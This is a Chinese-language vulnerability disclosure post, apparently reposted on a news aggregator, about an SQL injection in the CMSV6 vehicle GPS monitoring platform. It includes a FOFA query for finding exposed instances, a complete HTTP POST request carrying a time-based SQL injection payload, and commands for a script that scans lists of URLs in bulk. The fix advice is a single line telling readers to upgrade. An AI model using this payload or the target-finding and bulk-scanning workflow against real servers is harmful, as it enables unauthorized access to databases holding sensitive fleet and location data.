当前位置: 首页 > news >正文

【未公开0day】某某星CMSV6某某定位监控 getAlarmAppealByGuid SQL注入漏洞【附poc下载】

免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

fofa语法

body="/808gps/"

一、漏洞简述

某某星CMSV6某某定位监控平台是一款专业的车辆管理解决方案,提供实时定位、轨迹回放和状态监控等功能。该平台通过先进的GPS定位技术,帮助企业实现对车队的高效管理,提升运营效率和安全性。用户可以通过友好的界面,实时查看车辆位置、行驶路线和监控数据,支持多种报警功能,确保车辆安全和及时响应。其接口getAlarmAppealByGuid;downloadLogger.action存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、漏洞检测poc

POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56guid=1') AND (SELECT 1 FROM (SELECT(SLEEP(6)))w) AND ('1

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

POC下载:POC下载

批量检测:

python CMSV6_getAlarmAppealByGuid_SQLInject.py -f url.txt

单个url检测漏洞:

python CMSV6_getAlarmAppealByGuid_SQLInject.py -u url

四、修复

官方已更新补丁,请升级至最新版本。


http://www.mrgr.cn/news/51698.html

相关文章:

  • Java算术运算符 C语言的二维数组初始化
  • Python使用Selenium库实现CSDN自动化发帖
  • Redis提供了专门的命令来实现自增操作
  • 中国主要厂商3-羟基丁酸产能、销量、收入、价格和市场份额
  • Redis Geo 数据类型解析:基于 ZSET 的高效地理位置管理0708
  • flutter 使用三方/自家字体
  • python自动化办公实例(使用openpyxl、os处理统计Excel表中的数据并将其合并)
  • 业务连续性管理(Business Continuity Management, BCM)
  • 基于springboot摄影跟拍预定管理系统
  • AI 视频工具合集
  • 2024-10-16 学习人工智能的Day8
  • 物联网智能项目综述
  • 图(Java语言实现)
  • 网际报文协议ICMP及ICMP重定向实例详解2
  • 仓库管理系统
  • 极速fastpdf软件卸载后还是显示在pdf可用软件里,解决办法
  • 【AI学习】Mamba学习(七):HiPPO通用框架介绍
  • AUTOSAR_EXP_ARAComAPI的5章笔记(13)
  • 【H2O2|全栈】JS入门知识(二)
  • SQL数据库刷题sql_day34(移动平均值、累计求和)